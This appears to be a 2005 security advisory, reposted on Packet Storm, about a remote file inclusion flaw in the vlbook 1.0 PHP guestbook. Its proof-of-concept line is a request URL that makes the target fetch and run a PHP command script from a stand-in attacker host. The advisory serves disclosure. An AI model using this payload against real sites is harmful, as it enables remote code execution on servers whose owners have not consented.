vlbook guestbook version 1.0 is susceptible to a remote file inclusion vulnerability.
4dc0e691d445ccd48ee7105f49de1ab2b22f1db170ebdc3af3ddc7cb3cfec1fe------------------------------------------------------
Nightmare TeAmZ Advisory 005
------------------------------------------------------
Date - 10/2005
vlbook Remote File Inclusion
AFFECTED PRODUCTS
=================
vlbook 1.0 Guestbook
https://vlbook.com/
OVERVIEW
========
he vlbook is a free, open source and light-weight guestbook written in PHP
using flat files to store
messages and settings. It comes with install script for quick and effortless
installation.
DETAILS
=======
1. Remote File Inclusion
POC
===
1.
------
Remote File Inclusion
Exemple
--------
1. Remote File Inclusion
Vulnerable Path:
/index.php?user=
Exemple:
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=https://www.[Evil-Site.org/cmd.php?&cmd=id
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,
Site: https://www.NightmareTeAmZ.altervista.org
_________________________________________________________________
Blocca le pop-up pubblicitarie con MSN Toolbar! https://toolbar.msn.it/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed